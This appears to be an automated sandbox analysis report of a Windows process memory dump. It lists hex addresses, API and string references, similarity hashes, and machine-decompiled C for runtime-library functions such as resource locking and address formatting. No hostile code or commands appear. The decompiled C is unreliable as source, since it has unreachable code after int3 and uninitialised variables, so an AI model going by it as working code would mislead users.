                                                                                                                                                                0x00b92336
                                                                                                                                                                0x00b92336
                                                                                                                                                                0x00b9233b
                                                                                                                                                                0x00b9233d
                                                                                                                                                                0x00b92350
                                                                                                                                                                0x00b92351
                                                                                                                                                                0x00b92356
                                                                                                                                                                0x00b92359
                                                                                                                                                                0x00b92359
                                                                                                                                                                0x00b9235b
                                                                                                                                                                0x00b9235d
                                                                                                                                                                0x00b55367
                                                                                                                                                                0x00b5536b
                                                                                                                                                                0x00b55372
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92363
                                                                                                                                                                0x00b92363
                                                                                                                                                                0x00b92369
                                                                                                                                                                0x00b9236a
                                                                                                                                                                0x00b9236c
                                                                                                                                                                0x00b92371
                                                                                                                                                                0x00b92373
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92379
                                                                                                                                                                0x00b92379
                                                                                                                                                                0x00b9237a
                                                                                                                                                                0x00b9237f
                                                                                                                                                                0x00b9237f
                                                                                                                                                                0x00b92385
                                                                                                                                                                0x00b92386
                                                                                                                                                                0x00b92389
                                                                                                                                                                0x00b9238e
                                                                                                                                                                0x00b92390
                                                                                                                                                                0x00b55378
                                                                                                                                                                0x00b5537c
                                                                                                                                                                0x00b92396
                                                                                                                                                                0x00b92396
                                                                                                                                                                0x00b92397
                                                                                                                                                                0x00b9239c
                                                                                                                                                                0x00b923a2
                                                                                                                                                                0x00b923a3
                                                                                                                                                                0x00b923a6
                                                                                                                                                                0x00b923ab
                                                                                                                                                                0x00b923ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b923b3
                                                                                                                                                                0x00b923b3
                                                                                                                                                                0x00b923b4
                                                                                                                                                                0x00b923b9
                                                                                                                                                                0x00b923ba
                                                                                                                                                                0x00b923ba
                                                                                                                                                                0x00b923bc
                                                                                                                                                                0x00b923bf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89153
                                                                                                                                                                0x00b89158
                                                                                                                                                                0x00b8915a
                                                                                                                                                                0x00b8915e
                                                                                                                                                                0x00b89160
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89166
                                                                                                                                                                0x00b89166
                                                                                                                                                                0x00b89171
                                                                                                                                                                0x00b89176
                                                                                                                                                                0x00b89176
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89160
                                                                                                                                                                0x00b923c6
                                                                                                                                                                0x00b923ce
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923ad
                                                                                                                                                                0x00b92390
                                                                                                                                                                0x00b92373
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92293
                                                                                                                                                                0x00b92295
                                                                                                                                                                0x00b9229a
                                                                                                                                                                0x00b922a1
                                                                                                                                                                0x00b922a3
                                                                                                                                                                0x00b922a7
                                                                                                                                                                0x00b922a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922ab
                                                                                                                                                                0x00b922ad
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00b922b1
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553be
                                                                                                                                                                0x00b553c0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553cb
                                                                                                                                                                0x00b553ce
                                                                                                                                                                0x00b553d0
                                                                                                                                                                0x00b553d4
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553d8
                                                                                                                                                                0x00b553e3
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9228f
                                                                                                                                                                0x00b92349
                                                                                                                                                                0x00b9234d
                                                                                                                                                                0x00b92251
                                                                                                                                                                0x00b92251
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b92251
                                                                                                                                                                0x00b921a4
                                                                                                                                                                0x00b921a4
                                                                                                                                                                0x00b921a6
                                                                                                                                                                0x00b921a8
                                                                                                                                                                0x00b921ac
                                                                                                                                                                0x00b921b6
                                                                                                                                                                0x00b921b8
                                                                                                                                                                0x00b921bc
                                                                                                                                                                0x00b921be
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b921c0

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B92206
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-4236105082
                                                                                                                                                                • Opcode ID: 8319b105dbab7e5f12273fac150a429f1c4512d1c027ea44d0609466e900ba2f
                                                                                                                                                                • Instruction ID: e0572860c9297bc2faabee09bb8c0ff51f6dc8620fc82ceca450347fce00deba
                                                                                                                                                                • Opcode Fuzzy Hash: 8319b105dbab7e5f12273fac150a429f1c4512d1c027ea44d0609466e900ba2f
                                                                                                                                                                • Instruction Fuzzy Hash: 3E51F675B002116FEF14DB18CCC1FA673E9EB94B20F2182E9FD59EB285DA61EC418790
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E00B714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				char _v10;
                                                                                                                                                                				char _v140;
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int _t24;
                                                                                                                                                                				void* _t26;
                                                                                                                                                                				signed int _t29;
                                                                                                                                                                				signed int _t34;
                                                                                                                                                                				signed int _t40;
                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                				void* _t51;
                                                                                                                                                                				intOrPtr* _t52;
                                                                                                                                                                				void* _t54;
                                                                                                                                                                				signed int _t57;
                                                                                                                                                                				void* _t58;
                                                                                                                                                                
                                                                                                                                                                				_t51 = __edx;
                                                                                                                                                                				_t24 =  *0xc12088; // 0x776ba9e3
                                                                                                                                                                				_v8 = _t24 ^ _t57;
                                                                                                                                                                				_t45 = _a16;
                                                                                                                                                                				_t53 = _a4;
                                                                                                                                                                				_t52 = _a20;
                                                                                                                                                                				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                					L10:
                                                                                                                                                                					_t26 = 0xc000000d;
                                                                                                                                                                				} else {
                                                                                                                                                                					if(_t45 == 0) {
                                                                                                                                                                						if( *_t52 == _t45) {
                                                                                                                                                                							goto L3;
                                                                                                                                                                						} else {
                                                                                                                                                                							goto L10;
                                                                                                                                                                						}
                                                                                                                                                                					} else {
                                                                                                                                                                						L3:
                                                                                                                                                                						_t28 =  &_v140;
                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                							_push("[");
                                                                                                                                                                							_push(0x41);
                                                                                                                                                                							_push( &_v140);
                                                                                                                                                                							_t29 = E00B67707();
                                                                                                                                                                							_t58 = _t58 + 0xc;
                                                                                                                                                                							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                						}
                                                                                                                                                                						_t54 = E00B713CB(_t53, _t28);
                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                							_t34 = E00B67707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                                							_t58 = _t58 + 0x10;
                                                                                                                                                                							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                						}
                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                							_t40 = E00B67707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                                							_t58 = _t58 + 0x10;
                                                                                                                                                                							_t54 = _t54 + _t40 * 2;
                                                                                                                                                                						}
                                                                                                                                                                						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                                						 *_t52 = _t53;
                                                                                                                                                                						if( *_t52 < _t53) {
                                                                                                                                                                							goto L10;
                                                                                                                                                                						} else {
                                                                                                                                                                							E00B32340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                                							_t26 = 0;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				return E00B3E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                                			}





















                                                                                                                                                                APIs
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 00B9EA22
                                                                                                                                                                  • Part of subcall function 00B713CB: ___swprintf_l.LIBCMT ref: 00B7146B
                                                                                                                                                                  • Part of subcall function 00B713CB: ___swprintf_l.LIBCMT ref: 00B71490
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 00B7156D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 45%
                                                                                                                                                                			E00B553A5(signed int _a4, char _a8) {
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int _t32;
                                                                                                                                                                				signed int _t37;
                                                                                                                                                                				signed int _t40;
                                                                                                                                                                				signed int _t42;
                                                                                                                                                                				void* _t45;
                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                				void* _t48;
                                                                                                                                                                				signed int _t49;
                                                                                                                                                                				void* _t51;
                                                                                                                                                                				signed int _t57;
                                                                                                                                                                				signed int _t64;
                                                                                                                                                                				signed int _t71;
                                                                                                                                                                				void* _t74;
                                                                                                                                                                				intOrPtr _t78;
                                                                                                                                                                				signed int* _t79;
                                                                                                                                                                				void* _t85;
                                                                                                                                                                				signed int _t86;
                                                                                                                                                                				signed int _t92;
                                                                                                                                                                				void* _t104;
                                                                                                                                                                				void* _t105;
                                                                                                                                                                
                                                                                                                                                                				_t64 = _a4;
                                                                                                                                                                				_t32 =  *(_t64 + 0x28);
                                                                                                                                                                				_t71 = _t64 + 0x28;
                                                                                                                                                                				_push(_t92);
                                                                                                                                                                				if(_t32 < 0) {
                                                                                                                                                                					_t78 =  *[fs:0x18];
                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                                						goto L3;
                                                                                                                                                                					} else {
                                                                                                                                                                						__eflags = _t32 | 0xffffffff;
                                                                                                                                                                						asm("lock xadd [ecx], eax");
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					L3:
                                                                                                                                                                					_push(_t86);
                                                                                                                                                                					while(1) {
                                                                                                                                                                						L4:
                                                                                                                                                                						__eflags = _t32;
                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
                                                                                                                                                                						__eflags = _a8;
                                                                                                                                                                						if(_a8 == 0) {
                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                							return 0;
                                                                                                                                                                						} else {
                                                                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                							_t79 = _t64 + 0x24;
                                                                                                                                                                							_t71 = 1;
                                                                                                                                                                							asm("lock xadd [eax], ecx");
                                                                                                                                                                							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                							_a4 = _t32;
                                                                                                                                                                							__eflags = _t32;
                                                                                                                                                                							if(_t32 != 0) {
                                                                                                                                                                								L19:
                                                                                                                                                                								_t86 = 0;
                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                								while(1) {
                                                                                                                                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                									asm("sbb esi, esi");
                                                                                                                                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00c101c0;
                                                                                                                                                                									_push(_t92);
                                                                                                                                                                									_push(0);
                                                                                                                                                                									_t37 = E00B2F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                									__eflags = _t37 - 0x102;
                                                                                                                                                                									if(_t37 != 0x102) {
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									_t71 =  *(_t92 + 4);
                                                                                                                                                                									_t85 =  *_t92;
                                                                                                                                                                									_t51 = E00B74FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                									_push(_t85);
                                                                                                                                                                									_push(_t51);
                                                                                                                                                                									E00B83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                									E00B83F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                									_t86 = _t86 + 1;
                                                                                                                                                                									_t105 = _t104 + 0x28;
                                                                                                                                                                									__eflags = _t86 - 2;
                                                                                                                                                                									if(__eflags > 0) {
                                                                                                                                                                										E00BB217A(_t71, __eflags, _t64);
                                                                                                                                                                									}
                                                                                                                                                                									_push("RTL: Re-Waiting\n");
                                                                                                                                                                									_push(0);
                                                                                                                                                                									_push(0x65);
                                                                                                                                                                									E00B83F92();
                                                                                                                                                                									_t104 = _t105 + 0xc;
                                                                                                                                                                								}
                                                                                                                                                                								__eflags = _t37;
                                                                                                                                                                								if(__eflags < 0) {
                                                                                                                                                                									_push(_t37);
                                                                                                                                                                									E00B73915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                									asm("int3");
                                                                                                                                                                									_t40 =  *_t71;
                                                                                                                                                                									 *_t71 = 0;
                                                                                                                                                                									__eflags = _t40;
                                                                                                                                                                									if(_t40 == 0) {
                                                                                                                                                                										L1:
                                                                                                                                                                										_t42 = E00B55384(_t92 + 0x24);
                                                                                                                                                                										if(_t42 != 0) {
                                                                                                                                                                											goto L31;
                                                                                                                                                                										} else {
                                                                                                                                                                											goto L2;
                                                                                                                                                                										}
                                                                                                                                                                									} else {
                                                                                                                                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                										_push( &_a4);
                                                                                                                                                                										_push(_t40);
                                                                                                                                                                										_t49 = E00B2F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                										__eflags = _t49;
                                                                                                                                                                										if(__eflags >= 0) {
                                                                                                                                                                											goto L1;
                                                                                                                                                                										} else {
                                                                                                                                                                											_push(_t49);
                                                                                                                                                                											E00B73915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                											L31:
                                                                                                                                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                											_push( &_a4);
                                                                                                                                                                											_push(1);
                                                                                                                                                                											_t42 = E00B2F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                											__eflags = _t42;
                                                                                                                                                                											if(__eflags >= 0) {
                                                                                                                                                                												L2:
                                                                                                                                                                												return _t42;
                                                                                                                                                                											} else {
                                                                                                                                                                												_push(_t42);
                                                                                                                                                                												E00B73915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                												_push( &_a4);
                                                                                                                                                                												_push(1);
                                                                                                                                                                												_t42 = E00B2F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                												__eflags = _t42;
                                                                                                                                                                												if(__eflags >= 0) {
                                                                                                                                                                													goto L2;
                                                                                                                                                                												} else {
                                                                                                                                                                													_push(_t42);
                                                                                                                                                                													_t45 = E00B73915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                													asm("int3");
                                                                                                                                                                													while(1) {
                                                                                                                                                                														_t74 = _t45;
                                                                                                                                                                														__eflags = _t45 - 1;
                                                                                                                                                                														if(_t45 != 1) {
                                                                                                                                                                															break;
                                                                                                                                                                														}
                                                                                                                                                                														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                														_t45 = _t74;
                                                                                                                                                                														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                														__eflags = _t45 - _t74;
                                                                                                                                                                														if(_t45 != _t74) {
                                                                                                                                                                															continue;
                                                                                                                                                                														} else {
                                                                                                                                                                															_t46 =  *[fs:0x18];
                                                                                                                                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                															return _t46;
                                                                                                                                                                														}
                                                                                                                                                                														goto L38;
                                                                                                                                                                													}
                                                                                                                                                                													E00B55329(_t74, _t92);
                                                                                                                                                                													_push(1);
                                                                                                                                                                													_t48 = E00B553A5(_t92);
                                                                                                                                                                													return _t48;
                                                                                                                                                                												}
                                                                                                                                                                											}
                                                                                                                                                                										}
                                                                                                                                                                									}
                                                                                                                                                                								} else {
                                                                                                                                                                									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                									continue;
                                                                                                                                                                								}
                                                                                                                                                                							} else {
                                                                                                                                                                								_t71 =  *_t79;
                                                                                                                                                                								__eflags = _t71;
                                                                                                                                                                								if(__eflags > 0) {
                                                                                                                                                                									while(1) {
                                                                                                                                                                										_t57 = _t71;
                                                                                                                                                                										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                										__eflags = _t57 - _t71;
                                                                                                                                                                										if(_t57 == _t71) {
                                                                                                                                                                											break;
                                                                                                                                                                										}
                                                                                                                                                                										_t71 = _t57;
                                                                                                                                                                										__eflags = _t57;
                                                                                                                                                                										if(_t57 > 0) {
                                                                                                                                                                											continue;
                                                                                                                                                                										}
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									_t32 = _a4;
                                                                                                                                                                									__eflags = _t71;
                                                                                                                                                                								}
                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                									continue;
                                                                                                                                                                								} else {
                                                                                                                                                                									goto L19;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						goto L38;
                                                                                                                                                                					}
                                                                                                                                                                					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                					_t32 = 0;
                                                                                                                                                                					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                					__eflags = 0;
                                                                                                                                                                					if(0 != 0) {
                                                                                                                                                                						goto L4;
                                                                                                                                                                					} else {
                                                                                                                                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				L38:
                                                                                                                                                                			}


























                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b89160
                                                                                                                                                                0x00b923c6
                                                                                                                                                                0x00b923cb
                                                                                                                                                                0x00b923ce
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923d7
                                                                                                                                                                0x00b923ad
                                                                                                                                                                0x00b92390
                                                                                                                                                                0x00b92373
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9233f
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92291
                                                                                                                                                                0x00b92293
                                                                                                                                                                0x00b92295
                                                                                                                                                                0x00b9229a
                                                                                                                                                                0x00b922a1
                                                                                                                                                                0x00b922a3
                                                                                                                                                                0x00b922a7
                                                                                                                                                                0x00b922a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922ab
                                                                                                                                                                0x00b922ad
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922af
                                                                                                                                                                0x00b922b1
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b4
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b922b6
                                                                                                                                                                0x00b9228f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9226d
                                                                                                                                                                0x00b553cb
                                                                                                                                                                0x00b553ce
                                                                                                                                                                0x00b553d0
                                                                                                                                                                0x00b553d4
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b553d8
                                                                                                                                                                0x00b553e3
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00b553ea
                                                                                                                                                                0x00b553d6
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B922F4
                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Resource at %p, xrefs: 00B9230B
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 00B92328
                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B922FC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-871070163
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                			E00B5EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                				signed int _v24;
                                                                                                                                                                				intOrPtr* _v28;
                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                				signed int _v36;
                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                				short _v66;
                                                                                                                                                                				char _v72;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                				signed int _t40;
                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                				signed int _t44;
                                                                                                                                                                				void* _t46;
                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                				signed int _t49;
                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                				signed char _t67;
                                                                                                                                                                				void* _t72;
                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                				intOrPtr* _t80;
                                                                                                                                                                				intOrPtr _t84;
                                                                                                                                                                				intOrPtr* _t85;
                                                                                                                                                                				void* _t91;
                                                                                                                                                                				void* _t92;
                                                                                                                                                                				void* _t93;
                                                                                                                                                                
                                                                                                                                                                				_t80 = __edi;
                                                                                                                                                                				_t75 = __edx;
                                                                                                                                                                				_t70 = __ecx;
                                                                                                                                                                				_t84 = _a4;
                                                                                                                                                                				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                					E00B4DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                				}
                                                                                                                                                                				_push(0);
                                                                                                                                                                				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                				if(_t38 == 0xffffffff) {
                                                                                                                                                                					_t39 =  *0xc1793c; // 0x0
                                                                                                                                                                					_push(0);
                                                                                                                                                                					_push(_t84);
                                                                                                                                                                					_t40 = E00B316C0(_t39);
                                                                                                                                                                				} else {
                                                                                                                                                                					_t40 = E00B2F9D4(_t38);
                                                                                                                                                                				}
                                                                                                                                                                				_pop(_t85);
                                                                                                                                                                				__eflags = _t40;
                                                                                                                                                                				if(__eflags < 0) {
                                                                                                                                                                					_push(_t40);
                                                                                                                                                                					E00B73915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                					asm("int3");
                                                                                                                                                                					while(1) {
                                                                                                                                                                						L21:
                                                                                                                                                                						_t76 =  *[fs:0x18];
                                                                                                                                                                						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                							_v66 = 0x1722;
                                                                                                                                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                							_t76 =  &_v72;
                                                                                                                                                                							_push( &_v72);
                                                                                                                                                                							_v28 = _t85;
                                                                                                                                                                							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                							_push(0x10);
                                                                                                                                                                							_push(0x20402);
                                                                                                                                                                							E00B301A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                						}
                                                                                                                                                                						while(1) {
                                                                                                                                                                							_t43 = _v8;
                                                                                                                                                                							_push(_t80);
                                                                                                                                                                							_push(0);
                                                                                                                                                                							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                							if(_t43 == 0xffffffff) {
                                                                                                                                                                								_t71 =  *0xc1793c; // 0x0
                                                                                                                                                                								_push(_t85);
                                                                                                                                                                								_t44 = E00B31F28(_t71);
                                                                                                                                                                							} else {
                                                                                                                                                                								_t44 = E00B2F8CC(_t43);
                                                                                                                                                                							}
                                                                                                                                                                							__eflags = _t44 - 0x102;
                                                                                                                                                                							if(_t44 != 0x102) {
                                                                                                                                                                								__eflags = _t44;
                                                                                                                                                                								if(__eflags < 0) {
                                                                                                                                                                									_push(_t44);
                                                                                                                                                                									E00B73915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                									asm("int3");
                                                                                                                                                                									E00BB2306(_t85);
                                                                                                                                                                									__eflags = _t67 & 0x00000002;
                                                                                                                                                                									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                										_t72 = _t7;
                                                                                                                                                                										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                										__eflags = _t67 - _t67;
                                                                                                                                                                										if(_t67 == _t67) {
                                                                                                                                                                											E00B5EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                										}
                                                                                                                                                                									}
                                                                                                                                                                									return 0;
                                                                                                                                                                								} else {
                                                                                                                                                                									__eflags = _v24;
                                                                                                                                                                									if(_v24 != 0) {
                                                                                                                                                                										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
